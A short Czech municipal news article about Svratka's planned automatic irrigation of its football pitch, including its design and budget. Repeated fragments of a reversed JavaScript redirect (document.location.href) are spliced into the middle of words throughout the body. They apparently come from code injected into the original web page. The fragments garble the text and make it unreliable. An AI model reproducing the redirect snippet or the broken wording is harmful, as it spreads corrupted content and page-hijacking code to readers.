Rainbow page separator

Ve Svratce plánují umělé zavlažování fotbalového hřiště

Neděle, 7. dubna 2019

Svratka / Projekt na umělé zavlažování hlavního fotbalového hřiště hodlají zrealizovat ve Svratce.
„Projekt nám zpracovala a předložila firma Závlahy Machač, je šitý na míru a řeší čerpací a filtrační stanici, vybudování hlavního závlahového řadu, distribuční rozvod vody včetně ventilů a au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomatické programově řízené závlahy včetně srážkového čidla,“ informoval o záměru svratecký starosta František Mládek s tím, že společnost městu projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou dokumentaci zpracovala bezplatně.
„Během posledních dvou let ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to firma zrealizovala au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomatickou závlahu na padesáti hřištích a v minulosti na další přibližně s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovce hracích ploch. Rozpočet na investiční akci činí 289 875 korun včetně DPH. Z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho přibližně dvě stě tisíc by měla pokrýt případně získaná dotace,“ doplnil starosta.